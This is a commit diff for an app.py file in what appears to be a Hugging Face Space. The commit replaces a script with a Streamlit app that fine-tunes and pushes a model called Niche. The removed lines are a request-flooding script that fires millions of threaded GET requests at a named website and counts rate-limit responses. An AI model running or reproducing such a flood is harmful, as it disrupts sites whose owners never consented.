Neon-AI commited on
Commit
cab4035
·
verified ·
1 Parent(s): 94e55fb

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +122 -13
app.py CHANGED
@@ -1,18 +1,127 @@
1
- import requests
2
- from concurrent.futures import ThreadPoolExecutor
 
 
 
 
 
3
 
4
- url = "https://k-anime.zone.id" # change this
5
- headers = {"User-Agent": "Dead/1.0"}
 
 
6
 
7
- def make_request():
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
8
  try:
9
- r = requests.get(url, headers=headers, timeout=5)
10
- return r.status_code
11
- except:
12
- return "Error"
 
 
 
 
13
 
14
- with ThreadPoolExecutor(max_workers=5000000) as executor:
15
- results = list(executor.map(lambda _: make_request(), range(5000000)))
 
 
16
 
17
- print("Results:", results)
18
- print("429s / blocks:", results.count(429))
 
 
 
 
 
 
 
 
1
+ import streamlit as st
2
+ import json
3
+ import torch
4
+ from transformers import AutoTokenizer, AutoModelForCausalLM, Trainer, TrainingArguments
5
+ from datasets import Dataset
6
+ from peft import LoraConfig, get_peft_model
7
+ from huggingface_hub import HfApi, HfFolder, Repository
8
 
9
+ # -------- CONFIG ----------
10
+ MODEL_ID = "Neon-AI/Niche"
11
+ CHECKPOINT_DIR = "./checkpoints"
12
+ HF_TOKEN = st.secrets["HF_TOKEN"]
13
 
14
+ st.title("🧠 Niche Trainer with Push to HF")
15
+
16
+ # ---------- Load model once ----------
17
+ @st.cache_resource
18
+ def load_model():
19
+ tokenizer = AutoTokenizer.from_pretrained(MODEL_ID)
20
+ model = AutoModelForCausalLM.from_pretrained(
21
+ MODEL_ID,
22
+ torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32
23
+ )
24
+ if tokenizer.pad_token is None:
25
+ tokenizer.pad_token = tokenizer.eos_token
26
+ model.resize_token_embeddings(len(tokenizer))
27
+ return tokenizer, model
28
+
29
+ tokenizer, model = load_model()
30
+
31
+ # ---------- LoRA / Full model selection ----------
32
+ finetune_type = st.radio("Select fine-tune type:", ["Full model", "LoRA"])
33
+
34
+ # ---------- JSON input ----------
35
+ st.subheader("Paste your JSON training examples")
36
+ json_input = st.text_area(
37
+ "JSON format: [{'prompt': 'Hello', 'response': 'Hi there!'}, ...]",
38
+ height=300,
39
+ placeholder='[{"prompt": "...", "response": "..."}]'
40
+ )
41
+
42
+ # ---------- Train ----------
43
+ train_started = False
44
+ if st.button("Train"):
45
+ try:
46
+ examples = json.loads(json_input)
47
+ if not examples:
48
+ st.warning("No examples provided!")
49
+ else:
50
+ texts = [
51
+ f"### User:\n{e['prompt']}\n\n### Assistant:\n{e['response']}"
52
+ for e in examples
53
+ ]
54
+ ds = Dataset.from_dict({"text": texts})
55
+
56
+ def tokenize(batch):
57
+ out = tokenizer(batch["text"], truncation=True, padding="max_length", max_length=256)
58
+ out["labels"] = out["input_ids"].copy()
59
+ return out
60
+
61
+ ds = ds.map(tokenize, batched=True)
62
+ ds.set_format("torch")
63
+
64
+ # ---------- Apply LoRA if selected ----------
65
+ if finetune_type == "LoRA":
66
+ peft_config = LoraConfig(
67
+ task_type="CAUSAL_LM",
68
+ r=16,
69
+ lora_alpha=32,
70
+ lora_dropout=0.1,
71
+ target_modules=["c_attn"]
72
+ )
73
+ model_peft = get_peft_model(model, peft_config)
74
+ train_model = model_peft
75
+ else:
76
+ train_model = model
77
+
78
+ args = TrainingArguments(
79
+ output_dir=CHECKPOINT_DIR,
80
+ per_device_train_batch_size=1,
81
+ gradient_accumulation_steps=2,
82
+ num_train_epochs=1,
83
+ learning_rate=2e-5,
84
+ logging_steps=1,
85
+ save_strategy="no",
86
+ report_to="none",
87
+ )
88
+
89
+ trainer = Trainer(
90
+ model=train_model,
91
+ args=args,
92
+ train_dataset=ds
93
+ )
94
+
95
+ st.info("Training started...")
96
+ trainer.train()
97
+ st.success("✅ Training done!")
98
+ train_started = True
99
+ except Exception as e:
100
+ st.error(f"Error: {e}")
101
+
102
+ # ---------- Push to HF ----------
103
+ if train_started and st.button("Push to Hugging Face"):
104
  try:
105
+ repo = Repository(
106
+ local_dir=CHECKPOINT_DIR,
107
+ clone_from=MODEL_ID,
108
+ use_auth_token=HF_TOKEN
109
+ )
110
+ # Save trained model + tokenizer
111
+ train_model.save_pretrained(CHECKPOINT_DIR)
112
+ tokenizer.save_pretrained(CHECKPOINT_DIR)
113
 
114
+ repo.push_to_hub(commit_message="Update Niche model with new training")
115
+ st.success("✅ Model pushed to HF successfully!")
116
+ except Exception as e:
117
+ st.error(f"Push failed: {e}")
118
 
119
+ # ---------- Chat ----------
120
+ st.subheader("Test the model")
121
+ user_prompt = st.text_input("You:", "")
122
+ if st.button("Send"):
123
+ if user_prompt.strip():
124
+ inputs = tokenizer(user_prompt, return_tensors="pt").to(model.device)
125
+ outputs = model.generate(**inputs, max_new_tokens=100, do_sample=True, temperature=0.7)
126
+ response = tokenizer.decode(outputs[0], skip_special_tokens=True)
127
+ st.text_area("Niche:", value=response, height=200)